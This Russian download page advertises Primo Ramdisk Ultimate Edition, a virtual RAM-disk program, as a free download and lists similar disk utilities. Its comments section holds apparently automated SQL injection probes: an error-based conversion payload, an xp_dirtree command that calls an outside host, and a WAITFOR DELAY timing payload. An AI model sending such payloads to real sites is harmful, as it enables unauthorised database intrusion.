Программы для Windows


Primo Ramdisk Ultimate Edition виртуальный диск.


Primo Ramdisk Ultimate Edition виртуальный диск.


Primo Ramdisk Ultimate Edition – удобное ПО для быстрого создания функционального виртуального жесткого диска. Подобная практика не нова и активно применяется для резервного копирования важных данных, увеличения скорости доступа к ним, более удобного обмена данными между разными системами и пр. Скачать Primo Ramdisk Ultimate Edition на русском Rus версия для Windows 10/7 бесплатно можно по ссылке в конце описания программы.

Размер создаваемого диска, конечно, можно выбрать любой, но есть ограничения, продиктованные объемами оперативной памяти того ПК, на котором диск устанавливается. Как и для обычного диска, виртуальному присваивается буква идентификации, чтобы его легко было распознать в проводнике. Использование Рамдиска совершенно безопасно и, что немаловажно, бесшумно!

Преимущества использования Primo Ramdisk Ultimate Edition:

- Подключив виртуальный диск к гостевой и домашней операционкам, можно беспрепятственно перебрасываться файлами между ними.
- На виртуальный диск можно скидывать для хранения важные сведения и файлы, которые потом копировать на внешние носители.
- Для облегчения процесса резервного копирования, можно на виртуальном диске размещать однотипные файлы, к примеру видео, изображения или музыкальные записи.
- Виртуальный диск поможет продлить жизнь вашему системному жесткому диску.

Виртуальный диск от Primo Ramdisk Ultimate Edition совместим со всеми типами процессоров, гарантирует конфиденциальность помещенных на него данных и автоматически способен форматировать разделы в FAT12,16,32 и др.

Кроме того, размер диска всегда можно поменять. Его данные будут автоматически сохраняться в образе по завершении сеанса. Чтобы не возникло конфликта Рамдиска с программами системы, следует контролировать за объемами свободной оперативной памяти. Разобраться в программе создания виртуального жесткого диска совершенно не сложно, так как интерфейс русифицирован.

По отзывам пользователей, все достаточно продумано и удобно. На нашем сайте Primo Ramdisk скачать можно совершенно бесплатно, перейдя по ссылке ниже.

Ссылка на загрузку

Версия: 6.1.0
Разработчик: Romex Software
Год релиза: 2018
Поддерживаемые ОС: Windows 10, 7, 8.
Языки интерфейса: Русский
Размер файла: 8.64 Мб


Похожие бесплатные программы:

Ultra RAMDisk Pro - оптимизация жесткого диска.
Ultra RAMDisk Pro — отличное решение для владельцев слишком медленных персональных компьютеров. Конечно, приложение не творит чудеса и не превращает слабые ПК в игровые, тем не менее, ряд проблем с ....

Hidden Disk - виртуальный диск.
Hidden Disk — если на вашем компьютере не хватает памяти не из-за ошибок в операционной системе, а по причине забитости дисков, данная утилита здорово выручит. Также Hidden Disk скачать рекомендуем ....

DiskSavvy Ultimate - чистка жесткого диска.
DiskSavvy Ultimate — если вы считаете, что у вас несправедливо мало дискового пространства, можно смело устанавливать данное приложение. ПО полностью проанализирует дисковое пространство. Также оно ....

HDClone Free Edition - создание клона HDD диска.
HDClone Free Edition – каждому пользователю приходиться работать с жестким диском – контентом на нем. Когда необходимо скопировать несколько файлов, проще всего это сделать вручную без использования ....

EVEREST Ultimate Edition 2013 + Portable версия
EVEREST Ultimate Edition – это полная версия EVEREST Home Edition, которая имеет полный пакет возможностей по тестированию, мониторингу и настройке аппаратной части вашего компьютера. ....



Коментарии



Smith | Гости

'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'

1) exec('xp_dirtree ''\\dyr3ifv6rachhytggumjjdonfvgavrglzsymajjp'+'5hy.r87.me&
#039;+'\c$\a''')--

') WAITFOR DELAY '0:0:25'-- /* 28c42eee-fe9f-4cde-9a99-ad7f73e73f11 */
11 октября 2022 21:15
Панель добавления отзыва
Ваше Имя:


Ваш E-Mail:



Мне нравится Relizua
Группа Вконтакте